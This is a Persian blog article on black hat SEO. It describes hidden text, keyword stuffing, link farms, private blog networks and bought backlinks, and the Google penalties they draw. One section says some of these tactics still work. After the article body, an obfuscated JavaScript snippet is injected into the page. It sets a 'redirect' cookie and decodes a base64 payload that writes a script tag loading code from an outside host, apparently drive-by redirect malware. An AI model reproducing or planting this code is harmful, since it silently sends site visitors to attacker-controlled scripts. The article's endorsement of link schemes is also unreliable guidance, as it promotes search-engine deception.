بدون دیدگاه
2019/06/08
1524 بازدید

آموزش سئو کلاه سیاه و تکنیک ها | black hat seo چیست

در این مقاله با آموزش سئو کلاه سیاه با شما همراه خواهیم بود و با مزایا و معایب روش Black آشنا خواهیم شد. بارها برای شما پیش آمده است که از صبوری در مراحل انجام فعالیت های بهینه سازی خسته شده اید و دوست دارید هرچه زودتر به نتیجه ی ایده آل خود برسید. طبیعتاً برای رسیدن به این شرایط و بالا بردن ترافیک سایت خود دست به انجام یکسری از کارها می زنید.

خوب می دانید که موتور های جستجو برای تمامی سایت ها قوانین و مقرراتی را تعیین کرده و تمامی آنها را موظف به انجام آن می داند. این قوانین برای تمامی بخش ها می باشد و فقط بخش خاصی را شامل نمی شود.از مهمترین مجموعه قوانینی که گوگل برای سایت ها صادر کرده است قوانین مربوط به بهینه سازی می باشد. Search Engine ها هیچ علاقه ای به تخلف در محیط خود ندارند و کسانی که تخلف می کنند را جریمه می کنند، و چه بسا آنها را برای همیشه از دیتا بیس خود خارج می کنند. با وجود چنین شرایطی برخی از افراد دست به انجام اقداماتی برای بالا بردن ترافیک سایت خود می زنند که خلاف قوانین و مقررات است. در علوم و مفاهیم بهینه سازی این مجموعه از اقدامات را اصطلاحا سئو کلاه سیاه می گویند. ما در این مقاله قصد آموزش “تخلف کردن” برای شما را نداریم و صرفا بر مبنای تقاضا این مقاله را فرآهم کرده ایم و بیشتر جنبه ی آگاه سازی دارد. البته داشتن دانش کافی در این خصوص به شما در فرآیند بهینه سازی و افزایش رتبه وب سایتتان قطعا کمک می کند. هدف از این مقاله بیان مسائل و روش هایی است که باعث افت جایگاه وب سایت شما در موتور های جستجو می شود. موضوع اصلی بحث ما هم دقیقا این مجموعه اقدامات می باشد. در این مقاله سعی می کنیم بصورت جامع این مفاهیم را آموزش دهیم تا شما را با دنیایی دیگر از بهینه سازی آشنا کنیم.

آموزش سئو کلاه سیاه

سئو کلاه سیاه چیست و سئو کاران کلاه سیاه چه کسانی هستند

سئو کلاه سیاه یا Black Hat SEO به مجموعه تکنیک ها و تاکتیک هایی از بهینه سازی می گویند که به منظور فریب یا دستکاری موتورهای جستجو برای افزایش سریع رتبه ی سایت، انجام می شود. نیت اصلی این کارها فریب الگوریتم های موتور های جستجو می باشد. این اقدامات بصورت کامل با قوانین الگوریتم ها مخالفت دارد و در صورت مشاهده به شدت جریمه می شوند. Black Hat SEO مختص به یک بخش یا فعالیت های خاص نمی باشد بلکه شما می توانید آن را در تمامی قسمت های ارتقاء سایت خود استفاده کنید.

سئو کاران کلاه سیاه هم افرادی هستند که همیشه بدنبال پیدا کردن راهی برای گول زدن و دور زدن موتورهای جستجو هستند. دلیل اینکه افراد بسمت  Black SEO می روند این است که این نوع از بهینه سازی سریع تر از نوع سفید یا white به جواب می رسد، البته خطرناک نیز هست! یا بهتره بگوییم که بسیار خطرناک است! چرا؟ چون اگر سایت شما بعنوان سایتی که از تکنیک سیاه استفاده می کند توسط گوگل شناسایی شود، آن وقت شما دچار جریمه گوگل یا به اصطلاح پنالتی می شوید و دیگر به این راحتی نمی توانید اعتماد گوگل را بدست بیاورید. اگر در مورد جریمه های گوگل سوالی دارید می توانید به مقاله همه چیز در مورد جریمه گوگل یا پنالتی گوگل مراجعه نمایید.

یه فایل صوتی فوق العاده از خلاصه مطالب سئو کلاه سیاه

black hat seo

black hat seo


تکنیک ها:

البته که سئوکارانی که بصورت black کار بهینه سازی سایت ها را انجام می دهند، از تکنیک های مختلفی استفاده می کنند، زیرا الگوریتم های جدید گوگل روزبرور در حال پیشرفت هستند و از این تکنیک های سیاه جلوگیری می نماید،اکنون به برخی از روش های بهینه سازی که جزء مبانی سئو سیاه است و باعث افت رتبه ی شما می شود اشاره می کنیم. پیشنهاد ما به شما این است که بدنبال سئو منفی نباشید تا از گوگل در امان باشید.

لینک سازی داخلی

همانطور که می دانیم قالب لینک سازی داخلی، به صورت لینک گذاشتن بر روی کلمات است که باعث هدایت کاربران به دیگر صفحات می شود. این عمل لینک گذاری بر روی کلمات را اصطلاحاً انکرتکست (Anchor Text) می گویند. برای بهینه سازی هرچه بهتر سایت خود، معمولا کلمات کوتاه و مختصر را برای لینک دادن به دیگر صفحات دخلی استفاده می کنیم. استفاده از فرآیند لینک دهی داخلی امری ضروری و مهم در بهینه سازی سایت است. شما با این کار تمامی صفحات سایت خود را به یکدیگر مرتبط می سازید و با چرخیدن کاربران و ربات ها در آنها، صفحات را زنده نگه می دارید. حال بحث ما بر سر این موضوع است که این فرآیند چگونه به سایت ما آسیب می رساند؟

لینک سازی داخلی در سئو کلاه سیاه

هنگامی که شما بدون هدف بر روی کلمات، لینک داخلی می گذارید باعث افزایش تعداد لینک ها به دیگر صفحات می شوید. به خاطر داشته باشید که در داخل محتوای صفحه ی خود به میزان مشخصی از هر ترفند می توان استفاده کرد. زیاده روی کردن در این موضوع باعث می شود که شما از کلماتی برای لینک دادن استفاده کنید که هیج ارتباطی با موضوع اصلی صفحه ی لینک شده ندارد. این کار باعث می شود که کاربران را به صفحاتی هدایت کنید که هیچ ارتباطی به درخواست آنها ندارد. بزارید یه مثال براتون بزنم.  ویکی دمی یک سایت تخصصی در زمینه ی سئو و دیجیتال مارکتینک است. حالا شما وارد صفحه ی آموزش سئو کلاه سیاه شده اید. ما در اینجا بر روی یکسری از کلمات که موضوع اصلی دیگر صفحات است لینک زده ایم. حالا فکر کنید که بر روی تمامی کلمات صفحه لینک بگذاریم! طبیعتا این کار شما را اذیت می کند و ترجیح می دهید از صفحه خارج شوید چرا که شما دنبال محتوای با کیفیت برای حل مشکل خود می گردید و ما بجای رفع نیاز شما و ایجاد محتوای خوب و بهینه، فقط تمرکز خود را بر روی لینک دادن به دیگر صفحات گداشته ایم. نارضایتی کاربر و افزایش پگو استیکینگ (Pogo sticking)  فقط یک طرف قضیه است! از سمت دیگر الگورتم پاندا با دیدن محتوای بی کیفیت، شما را جریمه می کند و رتبه ی سایت شما را کاهش می دهد. پس به خاطر داشته باشید که استفاده ی بیش از حد در لینک سازی داخلی نه تنها مفید نیست بلکه تمام رشته های شما را پنبه می کند.

مخفی کردن بخشی از محتوا

یکی از راهکار های موثر در افزایش رتبه ی سایت ایجاد محتوای خوب ، جامع و کامل می باشد. محتوایی که شما تولید می کنید باید تمام نیاز های کاربر را پوشش دهد و با ذکر مثال و ایده های درست آنها را در درک بیشتر مطالب، کمک کنید. از طرف دیگر ربات های موتور جستجو نیز به خوبی متوجه موضوع صفحه ی شما می شوند و از طریق لینک های داخلی به دیگر صفحات ورود می کنند. طبیعتا همچین محتوایی، به خاطر داشتن تمامی اصول،  دارای متنی طولانی است. اما برخی از اشخاص این رویه را به صورتی دیگر پیش می برند. آنها برای توجیح ربات ها، محتوا را بار ها و بار ها تکرار می کنند که این کار باعث تکرار محتوا در سایت می شود. اگر کاربر این محتوا را ببیند طبیتا از تکرار مداوم یکسری از بخش ها خسته می شود و صفحه را ترک می کند. برای جلوگیری از چنین اتفاقی، محتوا هایی که تکرار می شوند را از دید مخاطب مخفی نگه می دارند تا فقط ربات ها بتوانند آنها را ببینند. با این روش هم کاربر اذیت نمی شود هم ربات ها متوجه موضوع محتوای سایت می شوند. از جمله اقداماتی که در این فرآیند انجام می دهند، می توان به موارد زیر اشاره کرد:

  کامل ترین آموزش yoast seo افزونه سئو وردپرس | معرفی افزونه های جایگزین یواست

مخفی کردن محتوا در Black Hat Seo

  • لینک ها را در کارکتر هایی که به چشم نمی آیند مانند نقطه، ویرگول، کاما و … مخفی می کنند.
  • بخشی از متن را در زیر تصاویر پنهان می کنند.
  • رنگ نوشتاری متن را با پس زمینه ی صفحه یکی می کنند که به چشم نیاید.
  • سایز نوشتن متن را به حدی ریز می کنند که قابل دیدن نیست.

این دسته از اشخاص به خیال اینکه با یک تیر دو نشان را زده اند، در دام یک تخلف بزرگ، گرفتار شده اند و بی خبر از آن هستند که ربا ت ها محتوا های مخفی شده را تشخیص می دهند و آنها را جریمه می کند.

سوء استفاده از کلمه کلیدی (Keyword Stuffing)

استفاده ی بیش از حد کلمات کلیدی در محتوای مقاله یکی از روش های غلط در بهینه سازی می باشد. این روش در گذشته برای متوجه کردن ربات های خزنده انجام می شد تا به خوبی تشخیص دهند که موضوع سایت در مورد چیست. این کار به مرور زمان باعث آسیب به تجربه ی کاربری ( UX ) شد. گوگل با آپدیت الگوریتم های خود توانست درک ربات ها را از موضوع سایت بالا ببرد و روش keyword stuffing را بی ارزش کند و آن را از ترفند های افزایش رتبه سایت خارج کند. در حال حاضر اگر شما بیش از حد از کلمات کلیدی استفاده کنید الگوریتم پاندا شما را مجرم شناخته و جریمه می کند.

تکنیک های سئو سیاه

لینک دادن به صفحات اصلی

در داخل هر یک از سایت ها بخش های خاصی برای در ارتباط بودن با کاربر تهیه شده است مثلا تماس با ما، درباره ما، خدمات، اخبار و رویدادها و عناصری مشابه به این ها. شما می توانید از این این عناصر در دو بخش footer و header سایت خود استفاده کنید. حتی این قابلیت هم دارید که از آنها در منوی سایت خود هم استفاده کنید. با این شرایط دیگر استفاده از آنها در داخل محتوای صفحه منطقی به نظر نمی رسد. شاید در بعضی از جاها لازم ببینید از آنها استفاده کنید اما در حالت کلی لینک دادن به این صفحات در داخل محتوای سایت نه تنها به شما در بهینه سازی و افزایش رتبه کمک نمی کند بلکه جزء ترفند های سئو کلاه سیاه نیز شمرده می شود و ارزش محتوایی شما را کاهش می دهد. بهتر است از هر چیزی در جای مناسب خود استفاده کنید.

محتوای تکراری (Duplicate Content) 

محتوای تکراری یا Duplicate Content به محتوایی گفته می شود که در بیش از یک صفحه تکرار شده باشد. همچنین اگر شما محتوایی را از یک سایت دیگر کپی کنید و در سایت خود تکرار کنید یک محتوای تکراری محسوب می شود. استفاده از این کار نه تنها درست نیست بلکه در خیلی از مواد اخلاقی به نظر نمیرسد. این ترفند در گذشته تاثیر گذار بود و می توانستید از آن برای گرفتن رتبه استفاده کنید ولی اکنون نه تنها به شما در کسب رتبه کمک نمی کند بلکه به سایت شما آسیب هم می رساند و باعث جریمه شدن سایت از طرف الگوریتم پاندا می شود. شما می توانید در مقاله مضرات محتوای تکراری در 2020 به طور کامل و با جزئیات بیشتری با معایب این روش آشنا شوید.

محتوای تکراری

استفاده از تگ های عنوان

ما از تگ های عنوان یا تگ های بدنه یا تگ های هدینگ (heading) برای بخش پذیری و سادگی در فهم محتوای خود استفاده می کنیم تا هم کاربر و هم ربات ها ارتباط بهتری با آن برقرار کنند و مطالب آن را راحت تر درک کنند. اگر که شما در تگ های عنوان بیش از حد از کلمات کلیدی استفاده کنید دچار افت رتبه در بهینه سازی می شوید. در صورت تمایل می توان از کلمات مترادف و هم خانواده با کلمه ی کلیدی استفاده کنید.

تگ های هدینگ در سئو منفی

تولید محتوای خودکار (Content Automation)

به محتواهایی که توسط نرم افزار های خاص ایجاد می شود محتوای ماشینی یا اتوماتیک می گویند. روش کار این دسته از نرم افزارها به این صورت می باشد که شما با دادن عبارات و کلمات کلیدی هدف خود به این نرم افزار ها، آنها شروع به تولید محتوا در خصوص موضوع و کلمات کلیدی شما می کنند.

با کمی دقت می توان این دسته از محتواها را تشخیص داد. عدم فاصله گذاری و رعایت نکردن اصول نگارش از برجسته ترین تفاوت های محتوای اتوماتیک با دیگر محتوا ها می باشد. همچین در این دسته از محتوا ها انتقال مفهموم و مطلب به دلیلی مکانیکی بودن آن، پایین است.

تولید محتوای خودکار

الگوریتم های گوگل در طی آپدیت های اخیر خود به خوبی می توانند این دسته از محتوا ها را تشخیص دهند و در صورت مشاهده، آنها را جریمه می کنند.

تبادل لینک (Link exchange)

یکی دیگر از ترفند هایی که در بهینه سازی سایت شما مفید است ولی در صورت تخلف در آن جریمه خواهید شد فرآیند تبادل لینک یا Link exchange می باشد. هنگامی که دیگر سایت ها به شما لینک می دهند موتور جستجو متوجه می شود که سایت شما دارای اعتبار است به همین دلیل به سایت شما اعتماد کرده و رتبه ی شما را بالا می برد، در نتیجه، در نتایج جستجو سایت شما را به نمایش می گذارد. این ارزش گذاری برای بک لینک، باعث شده است برخی از سایت ها به فکر خرید بک لینک از سایت های معتبر بیفتند و یا با برخی از سایت ها به تبادل لینک بپردارد. این ترفند هم دیگر مثل قبل تاثیر گذار نیست و الگوریتم پنگوئن  قابلیت تشخیص بک لینک های ساختگی و تبادل بیش از حد لینک ها مابین سایت ها را دارد و در صورت مشاهده آنها را جریمه می کنند.

تبادل لینک در کلاه سیاه

لینک سازی حلقه ای (Web Rings)

ترفند دیگر که در زمینه ی تبادل لینک وجود داد استفاده از لینک سازی بصورت حلقه ای است یا Web Rings می باشد. در این روش تعدادی از وب سایت ها به صورت حلقه به یکدیگر لینک می دهند تا سایت لینک دهنده و لینک گیرنده قابل تشخیص نباشد. به این صورت که سایتی که لینک را صادر می کند در نهایت بک لینک از آخرین سایت به خودش بر می گردد. این ترفند یکی از روش های Negative SEO است که هنوز برای موتورهای جستجو نا مفهوم است. با توجه به تجربیات متخصصین ویکی دمی در زمینه ی بهینه سازی وب سایت ها، در آپدیت های جدید الگوریتم ها این ترفند هم به صورت جدی پیگیری می شود و زیر ذره بین آنها قرار می گیرد.

مزرعه لینک (Link Farm)

با توجه به معنای آن می توان در ذهن خود یکسری از تصورات، درخصوص نحوه ی کار با مزرعه ی لینک کرد. در این روش یکسری سایت و وبلاگ ساخته می شوند که هدف از ایجاد آنها دادن لینک به سایت اصلی می باشد. اینکار برای دادن ارزش و تقویت سایت هدف انجام می شود.

  فیلم ایجاد کلمات کلیدی هدفمند و بهینه سازی صفحه

درر ابتدای تأسیس این روش، سایت هایی وجود داشتند که با پرداخت هزینه، به سایت شما لینک داده و به این صورت باعث افزایش رتبه ی سایت شما می شدند. این کار باعث شد که وبلاگ ها و دایرکتوری هایی فقط با نیت لینک دادن به دیگر وب سایت ها ایجاد شوند، که مملو از موضوعات غیر مرتبط بوند.

تکنیک PBN

با آپدیت الگوریتم پنگوئن دیگر این کار در افزاریش رتبه و بهینه سازی کم ارزش شد و در صورت مشاهده رتبه ی وب سایت شما افت پیدا می کند. با گذشت زمان وب مستران به این فکر افتادند که وبلاگ ها یا سایت هایی فقط برای اهداف خود ایجاد کنند و در آن موضوعات مرتبط با کسب کار خود، قرار دهند. این وبلاگ ها به مرور زمان رتبه می گرفتند و بالا می آمدند. وب مستران از طریق همین وبلاگ ها و سایت ها به سایت اصلی لینک می دهند تا با این ترفند اعتماد موتور جستجو را جلب کنند و رتبه ی سایت هدف را بالا ببرند. به مرور زمان افراد بیشتری سمت این روش آمدند در نتیجه الگوریتم ها فهمیدند و اعبار این کار رو کاهش دادند.

تکنیک Link Farm با نام PBN نیز شناخته می شود. PBN مخفف عباررت Private Blog Network  می باشد. اگر که این عبارت را با نام Private Backlink Network   دیدی دقیقا اشاره به همین روش دارد.

خرید بک لینک غیر اصولی (Buy backlinks)

در این روش شما به سایت های هم موضوع با سایت خود مراجعه می کنید و با پرداخت هزینه، لینک سایت خود را در آنجا قرار می دهید. اگر این کار را در سایت هایی با موضوعی متفاوت با موضوع سایت خود انجام دهید، نه تنها تاثیر گذار نخواهد بود بلکه احتمال جریمه شدن شما را هم فرآهم می کند.

خرید بک لینک

برای این کار بهتر است سایت هایی را انتخاب کنید که دارای ارزش و اعتبار بالایی هستند. این سایت ها با دادن لینک به سایت شما، ارزش و اعتبار سایت خود را به سایت شما انتقال می دهند. معمولا در این سایت ها به دلیل قرار گرفتن بک لینک های زیاد، توجه گوگل به سمت آن جلب می شود و دیگر ارزش و اعتبار قبل را به بک لینک های آن نمی دهند.

اگر می خواهید موضوع خرید بک لینک ها را به طور کامل و دقیق تر بررسی کنید می توانید به مقاله همه چیز درباره خرید بک لینک: آیا خرید بک لینک اشتباه است؟ مراجعه کنید.

بهینه سازی متن جایگزین تصویر

بهینه سازی متن جایگزین تصویر یا همان تگ alt عکس یا به عبارن دیگر alt text یکی دیگر از راهکار های بیهنه سازی می باشد که برای تصاویر سایت مورد استفاده قرار می گیرد. در اینجا هم شما باید ربات های موتور جستجو را متوجه موضوع تصویر خود بکنید تا به خوبی آن را درک کنند و در نتایج جستجو های تصویری، آن را نمایش دهند. با توجه به توضیحات گفته شده متوجه می شویم که بهینه سازی این متن بسیار اهمیت دارد و تگ alt باید توصیف دقیقی از محتوای تصویر باشد. استفاده ی بیش از حد از کلمات کلیدی کانونی و هدف شما در توصیف عکس باعث کاهش رتبه ی سایت شما و جریمه شدن می شود. از طرفی دیگر در صورتی که شما برای تمامی تصاویر خود از یک محتوای توصیفی استفاده کنید ربات های گوگل متوجه می شوند که شما قصد فریب آنها را دارید و شما را جریمه می کنند. هریک از تصاویر استفاده شده در صفحه باید توصیف مختص به خود را داشته باشند تا در نتایج جستجوی کاربران به خوبی نمایش داده شوند.

تکنیک های سئو منفی

حواستان باشد ناخواسته در دام سئو کلاه سیاه دچار نشوید!

برخی از کاربران در حین انجام بهینه سازی سایت خود و تلاش برای دوری از روش کلاه سیاه ناگهان دچار جریمه شده اند و فعالیت آنها به نحوی کلاه سیاه معرفی شده است. تنها دلیلی که برای این کار وجود دارد آگاه نبودن نسبت به قوانین الگوریتم ها  می باشد. پس سعی کنید دانش و آگاهی خود را از قوانین و ضوابط موتور های جستجو بالا ببرید که زحمات شما در راستای بهینه سازی به هدر نرود.

  • در سئو زیادی خوب نباش .. اعتدال رو رعایت کن

اگر شما در طی فرآیند بهینه سازی برطبق اصول و قوائد پیش بروید و قصد هیچگونه تخلفی را هم نداشته باشید اما در انجام آن زیاده رویی کنید بازهم دچار فرآیندی مشابه به سئو کلاه سیاه شده اید که اصطلاحا به آن Over Optimization می گوید. بیش از حد بهینه کردن سایت خود باعث ایجاد آسیب به رتبه ی سایت می شود. این وسواس فکری را کنار بگذارید. در هر موضوعی حتی خوب بودن اعتدال را رعایت کنید چه برسد به بهینه کردن سایت خود. زیاده روی کردن در انجام تکنیک های مفید برای بهینه سازی سایت باعث ایجاد آسیب های شدیدی می شود. به عنوان مثال اگر در طول درمان قرص مفیدی برای شما تجویز می شود که باعث برطرف شدن بیماری شما می شود، بنا به تجویز دکتر شما باید در ساعات مشخصی از آن استفاده کنید. مصرف یکباره تمامی قرص ها نه تنها گره از کار شما باز نمی کند بلکه صدمات جبران ناپذیری را به همراه دارد. این رویه در بهینه سازی هم صادق است. نباید در استفاده از یک ترفند زیاده رویی کنید و به رتبه ی خود در Search Engine ها آسیب بزنید.

از این روش ها در سئو کلاه سیاه دوری کنید

تولید محتوای کپی و بی کیفیت

برای اینکه مخاطب های بیشتری را جذب سایت کنید سعی کنید همیشه تولید محتوای با کیفیت و اورجینال را در دستور کار خود قرار دهید و هرگز هرگز از محتوای کپی وبسایت های دیگه استقاده نکنید.

فکر گول زدن گوگل را از سر بیرون کنید

موتورجستجویی مثل گوگل را مثل یک کاربر عادی تصور کنید و از هرگونه کار ممنوعه که در کتاب قانون گوگل ( راهنمای قوانین گوگل ) آمده خودداری کنید و فقط تمرکز خود را بر روی ارائه محتوای کاربردی برای کاربران قرار دهید.

سوء استفاده از داده های ساختار یافته

این داده ها ساختار یافته به فهم گوگل از محتوای ما کمک میکنند و در نتایج گوگل به شکل ریچ اسنیپت ظاهر میشود. سئو کلاه سیاه شامل اطلاعات نادقیقی در داده‌های ساختاردهی شده است تا موتورهای جستجو و کاربران را گول بزند. برای مثال افزودن ستاره یا همان امتیاز به صورت تقلبی باعث شک گوگل و جریمه گوگل میشود.

از جایگزین کردن یک متن در یک صفحه رتبه دار خوداری کنید

در این روش از سئو کلاه سیاه، صفحه ای در گوگل که به خاطر محتوای خوبی که در یک کلمه رنک گرفته را با یک محتوای کاملا غیر مرتبط با آن کلمه کلیدی عوض میکنند.  محتوای جدید هم به آن خوبی‌ها نیست. همچنین احتمال کمی هست که کاربر روی لینک کلیک کند.

تکنیک هایی از سئو کلاه سیاه که هنوز کار میکند!!

انتخاب کلمه کلیدی در نام دامنه سایت

ساختار الگوریتم های گوگل به گونه ای است که یک وبسایت به سرعت روی نام خودش سئو میشود. برای مثال در حوزه طراحی سایت و سئو بسیاری از نام دامنه وبسایت های فعال در این حوزه دارای کلمه کلیدی همچون طراحی سایت و سئو “tarahi-site”  هستند. البته این موضوع باعث نمیشود که قطعا شما روی کلمه کلیدی اصلی کسب و کارتان به لینک یک گوگل برسید؛ چون گوگل هم کم و بیش این موضوع را درک میکند.

  Keyword stuffing چیست و چطور می توان از آن اجتناب کرد؟

ساخت و خرید بک لینک

به طور کلی گوگل با لینک های خارجی که به صورت مصنوعی ساخته شوند، مشکل دارد. این یعنی لینکی که شما در قبال آن پول، محصول و… داده باشید، از طرف گوگل به عنوان لینک اسپم شناخته میشود. همینطور در صورتی که خودتان اقدام به ساخت لینک برای سایتتان کنید، در حال پیاده سازی سئو کلاه سیاه هستید. اما، در صورتی که کمی با تکنیک های ساخت و خرید بک لینک آشنا باشید، میتوانید به خوبی وب سایت خودتان را با کمک گرفتن از همین دو تکنیک به نتایج اول برسانید.

ایجاد pbn

یکی از خطری ترین روش های و تکنیک های سئو کلاه سیاه pbn بر روی سایت که گوگل به محض متوجه شدن آن سایت مورد نظر را جریمه میکند.اما در صورت اجرای درست تکنیک های pbn نتیجه فوق العاده خوبی دریافت خواهید کرد.

چگونه سئو کلاه سیاه را به گوگل گزارش دهیم؟

برای اینکه سئو کلاه سیاه را گزارش دهید، شما به دو دلیل نیاز دارید. اولین دلیل این است که ممکن است رقیبان برروی سایت شما شروع به حمله کردن، کرده باشند یا اینکه شروع به انجام (Negative Seo) دست زده باشند، در این حالت نیاز است که شما به گوگل در مورد این مشکل گزارش دهید وگرنه ممکن است گوگل همه چیز را از چشم شما ببیند و شما را جریمه یا به اصطلاح پنالتی نماید، اگر در مورد جریمه گوگل اطلاعات ندارید، به مقاله همه چیز در مورد جریمه گوگل مراجعه نمایید. برای گزارش این مشکل به گوگل شما یک کار باید انجام دهید و آن هم این است که در وبمستر گوگل یک فایل گزارش تهیه نمایید و برای گوگل ارسال نمایید، البته توجه داشته باشید که کاهش رتبه به مدت محدود کلاه سیاه حساب نمی شود و در صورتی که از اینکه شخصی واقعاً برروی سایت شما سئو منفی انجام می دهد مطمئن نیستید، دست به گزارش به گوگل نکنید، چون استفاده اشتباه و گزارش الکی به گوگل خودش جزو کار های Black SEO محسوب می شود.

جریمه سئو black hat

حال اگر سایت من دچار هک و حمله شد چه کاری باید انجام بدهم؟

مورد دوم یا در حقیقت دلیل دومی که باعث می شود شما سئو کلاه سیاه را به گوگل اطلاع دهید، این است که سایت شما دچار همه یا هک شده باشد، در این حال باید از ارسال گزارش به گوگل (malware report) استفاده نمایید. در این روش شما وارد وبمستر می شوید و درخواست بازبینی برروی وبسایتتان را به گوگل می دهید و گوگل اینبار مسائل امنیتی را برروی سایت شما بررسی می کند و درصورتی که سایت شما مشکلی داشته باشد در بخش security issues به شما پیامی در مورد مشکل پیش آمده برایتان ارسال می کند و می توانید از همان طریق هم مشکلات موجود در سایت را بررسی نمایید و به گوگل درخواست بازبینی دوباره ارسال نمایید.

چرا باید از سئو کلاه سیاه دوری کرد؟

البته که سئو کلاه سیاه نسبت به حالت سفید زودتر به نتیجه میرسد و سایت شما را در مدت زمان بسیار کمتری در رتبه های 1تا10 در نتایج قرار می دهد، اما باید به یک نکته توجه داشته باشید، این نوع از بهینه سازی می تواند همه ی سرمایه و زمان شما را هم برباد دهد! اگر گوگل متوجه شود که شما در حال انجام بهینه سازی با روش سیاه هستید، در این حالت سایت شما را جریمه می کند و دیگر به این راحتی نمی توانید اعتماد گوگل را جلب نمایید! در سال های اخیر سخت گیری گوگل برروی سایت ها بسیار بیشتر شده و سعی بر این دارد که بهترین سایت ها را به کاربران نمایش دهد و به همین دلیل است که فاکتورهای SEO همینطور در حال افزایش هستند و الگوریتم های گوگل هم هرروز در حال پیشرفته تر شدن هستند. بنابراین به ریسکش نمی ارزد که سایت خودتان و سرمایه تان را به خطر بیندازید، مگر در مورد کارهایی که رقیبان شما هم از سیاه منفی استفاده می کنند و نمی شود به این راحتی با استفاده از سئو مثبت (White) به آن ها رسید!

تفاوت سئو کلاه سیاه و کلاه سفید

تفاوت سئو کلاه سیاه سفید

تمامی موتور های جستجو با یک هدف خاص فعالیت می کنند، آن هم جلب رضایت کاربران است. موتورهای جستجو برای نظارت کامل بر تمامی کار ها و فعالیت های شما در وب سایتتان الگوریتم ها را طراحی می کنند تا در صورت مشاهده ی هرگونه تخلفی شما را جریمه کنند. هر یک از الگوریتم ها برای هدف خاصی طراحی شده اند که تمامی جنبه های کاری شما را زیر نظر داشته باشند. اگر که در بهینه سازی سایت تمام فکر خود را بر روی کاربر و رفع نیازهای آن متمرکز کنید، به خواست و هدف موتور های جستجو نزدیک می شوید و خواه نا خواه رتبه ی سایت شما افزایش پیدا می کند و می توانید جایگاه خوبی را در صفحه ی نخست نتایج جستجو بدست آورید.

در مورد حالت کلاه سیاه بسیار صحبت کردیم و گفتیم که اگر بقای کسب و کارتان برایتان مهم است به سراغ این نوع از بهینه سازی نروید! اما سوال اینجاست که روش کلاه سفید برای چه کسب و کار هایی مناسب است؟ این نوع از بهینه سازی مناسب ترین نوع  است یا نه روش های دیگری هم وجود دارد؟

قبل از اینکه جواب سوالات را بگوییم باید به شما توضیح دهیم که SEO دارای سه نوع تکنیک است، سئو کلاه سیاه، کلاه سفید و کلاه خاکستری. حال می پردازیم به سوالات مطرح شده، White SEO برای چه کسب و کارهایی مناسب است؟ قطعاً که آدم از درست کار کردن ضربه نمی خوره! اما در بعضی از مواقع ممکن است زمان برای شما مهم تر از درست کار کردن مهم باشه! در این حالت White Hat SEO مناسب شما نیست. اما اگر شما قصد دارید که برای کسب و کارتان برنامه ریزی و استراتژی بلند مدت داشته باشید (حداقل 6ماه) در این حالت است که  White SEO می تواند خیالتان را راحت کند و نگران نباشید که آپدیت های جدید گوگل چه بلایی سر سایتتان خواهد آورد. سئو کلاه سفید به مجموعه تکنیک ها و تاکتیک هایی گفته می شود که در چهارچوب قوانین و مقررات موتورهای جستجو پیش می رود. در روش سفید  شما بیشتر کاربران را مورد توجه قرار می دهید و سایتتان را بر اساس سلیقه و دل آن ها طراحی می کنید، محتواهای کاربردی و جامع برایشان می نویسید و از همه جهت به کاربر توجه می کنید. بهینه سازی سایت هایتان را برای کاربر انجام می دهید و به مرور منتظر می شوید که گوگل سایت شما را بررسی نماید و بفهمد که شما دارید واقعاً صادقانه کار می کنید.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

ده − 9 =